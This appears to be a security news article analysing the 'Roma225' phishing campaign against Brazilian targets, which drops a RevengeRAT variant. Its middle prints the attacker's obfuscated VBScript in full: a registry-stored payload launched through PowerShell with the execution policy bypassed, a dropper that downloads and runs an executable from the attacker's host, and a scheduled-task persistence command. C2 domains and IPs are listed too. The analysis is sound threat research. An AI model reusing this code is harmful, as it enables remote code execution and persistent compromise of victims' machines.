The malware was spread through well-written phishing email trying to impersonate a senior partner of one of the major Brazilian business law firms: “Veirano Advogados”.
The malicious email intercepted during the CSDC operations contains a PowerPoint add-in document (“.ppa” extension), armed with auto-open VBA macro code.
The macro code in the .ppa file contains a simple instruction invoking the “mshta.exe” tool to download and execute the next-stage of the dropper retrieved from “hxxps://minhacasaminhavidacdt.blogspot[.com/”.
The Blogspot hosted web page downloaded by mshta.exe appears innocent-looking to a quick skim through: opening it into the browser shows a perfectly rendered work-in progress blog page.
But a deeper inspection of its source code reveals an interesting snippet inserted into an invisible blog post: this ghost article contains VBScript code.
It’s funny to see the malware author tried to attribute the paternity of the script to “Microsoft Corp.”, adding pieces of comments belonging to legit Microsoft utilities:
‘Update———————————————————————————————
‘ Copyright: Microsoft Corp.
‘
‘ This script is designed to be used only for scheduled tasks(s).
‘ There is no extensive error check, and will not dump the output from the Powershell CmdLet.
‘
‘ Usage: SyncAppvPublishingServer {cmdline-args(passthrough to cmdlet)}
These comments are in fact part of the “SyncAppvPublishingServer” utility, commonly deployed into Windows 10 machines at “C:\Windows\System32\SyncAppvPublishingServer.vbs”. Anyway, the remaining part of the script is responsible to execute a series of malicious actions:
CreateObject("Wscript.Shell").regwrite "HKCU\AppEvents\Values", "TVqQAAMAAAAEAAAA//8AALgAAA.....[continue]" , "REG_SZ"
Set A0102030405 = CreateObject("WScript.Shell")
Dim CDT0908087CDT
CDT0908087CDT = "cmd." + "exe /C rundll32." + "exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""cmd." + "exe /c power" + "shell -" + "Execution" + "Policy Bypass -windows" + "tyle hidden -noexit -Command [Reflection." + "Assembly]::Load([Convert]::FromBase64String((Get-ItemProperty HKCU:\AppEvents).Values)).EntryPoint" + ".Invoke($N" + "ull,$" + "Null)"",0,true);"
A0102030405.run CDT0908087CDT, vbHide
Set XbonXo = CreateObject("WScript.Shell")
Dim XoowA83AC
XoowA83AC = "c" + "M" + "d /c cd %TEMP% &@echo Z6h = ""h" + "t" + "tp://cdtmaster.com.br/Document." + "mp3"">>Z3j.vbs &@echo M2l = M5t(""R]Qc[S\b<SfS"")>>Z3j.vbs &@echo Set M1s = CreateObject(M5t(""[af[Z@<f[ZVbb^""))>>Z3j.vbs &@echo M1s.Open M5t(""USb""), Z6h, False>>Z3j.vbs &@echo M1s.send ("""")>>Z3j.vbs &@echo Set E3i = CreateObject(M5t(""OR]RP<ab`SO[""))>>Z3j.vbs &@echo E3i.Open>>Z3j.vbs &@echo E3i.Type = 1 >>Z3j.vbs &@echo E3i.Write M1s.ResponseBody>>Z3j.vbs & @echo E3i.Position = 0 >>Z3j.vbs &@echo E3i.SaveToFile M2l, 2 >>Z3j.vbs &@echo E3i.Close>>Z3j.vbs &@echo function M5t(N3y) >> Z3j.vbs &@echo For S2r = 1 To Len(N3y) >>Z3j.vbs &@echo E0k = Mid(N3y, S2r, 1) >>Z3j.vbs &@echo E0k = Chr(Asc(E0k)- 14) >>Z3j.vbs &@echo G3f = G3f + E0k >> Z3j.vbs &@echo Next >>Z3j.vbs &@echo M5t = G3f >>Z3j.vbs &@echo End Function >>Z3j.vbs& Z3j.vbs &dEl Z3j.vbs & timeout 2 & DOCUMENT.EXE"
XbonXo.Run XoowA83AC, vbHide
Dim OUGo57658586GFFJHG
Set OUGo57658586GFFJHG = CreateObject("WScript.Shell")
asdmmmc= "c" + "Md /c Sc" + "hTa" + "sks /Cre" + "ate /sc MIN" + "UTE /MO 120 /TN OfficeData /TR ""m" + "sh" + "ta." + "exe h" + "ttp" + "s://pocasideiascdt.blogspot.com/"" /F "
OUGo57658586GFFJHG.Run asdmmmc, vbHide
self.close
Summing up, the last stages of the infection chain are designed to install a RevengeRAT variant hidden into a regkey and run the “outlook.exe” executable extracted by the “Document.exe” binary, retrieved from “hxxp://cdtmaster.com[.]br/Document.mp3”.
The following image briefly shows the malware infection chain:
Once executed, the RAT immediately contacts its command and control servers sending victim machine’s information. In the analyzed sample, the author configured two different C2 destinations: “office365update[.]duckdns.org” and “systen32.ddns[.]net“.
If one of these is down, the malware falls back to the other one. At time of writing, both the remote C2 were down, so it was only possible to emulate the server behavior in order to analyze the information sent by the RAT.
Anyway, the malware establishes a TCP connection with the server and sends to it the following stream:
At first sight, it’s possible to spot a repeated sequence of chars used as separator between the data fields:
roma225
This string have been chosen by the attacker during the preparation of the malware, using the customization functionalities provided by the RevengeRAT builder. Splitting and decoding the data stream, information becomes clearer:
As told before, the C2s were unresponsive at time of writing, however their latest IP resolution indicates the infrastructure of the attacker could be located in different countries.
For instance, the domain “office365update[.]duckdns.org” resolved to the 184.75.209.169 IP addresss, geolocated in Canada.
Moreover, “systen32.ddns[.]net” resolved to the 138.36.3.228 IP, geolocated in Brazil.
The “Document.exe” file is hosted at “cdtmaster.com[.]br” and is actually downloaded into the victim machine by the “Z3j.vbs” script. This PE32 file is characterized by the Pokemon Megaball image used as program icon and its unique purpose is to deploy and run the “Outlook.exe” payload.
Extracting static PE information from this last sample, reveals references to the “SendBlaster” application, a program used to deliver newsletters. Here, another interesting fact comes up: this product is currently developed by the Italian firm eDisplay Srl, so, in addition to the “roma225” separator, represents another direct reference to the Italian landscape.
When the “Outlook.exe” payload is executed, it remains apparently quiet: no outgoing network traffic or file system modifications; however it binds a listening TCP socket on localhost: “tcp://127.0.0.1:49356“.
Cybaze-Yoroi ZLab researchers are still dissecting the Outlook.exe sample to extract its real behavior.
After this first analysis, it’s difficult to attribute the attack to a specific threat actor. In the past, RevengeRAT variants were also used by APT groups such as The Gorgon Group, the enigmatic threat actor tracked by the Unit42 researchers, author of cyber espionage campaigns against UK, Spain, Russia and US governmental organization. However, the source code of the RAT has been publicly leaked few years ago and could be actually part of a multitude of cyber arsenals, more or less sophisticated.
Anyway, there are TTP in common with Unit42 report, such as the usage of shared infrastructure (in the specific case the Blogger service) as drop-server and other popular RAT as final backdoor (i.e. njRAT).
In fact, the “cdtmaster.com.]br” hosts other suspicious files such as the “nj.mp3” binary, which actually is a njRAT variant. All the other files are still under investigation.
Technical details about the Roma225
[adrotate banner=”9″] | [adrotate banner=”12″] |
(SecurityAffairs – Roma225, cyberespionage)
[adrotate banner=”5″] [adrotate banner=”13″]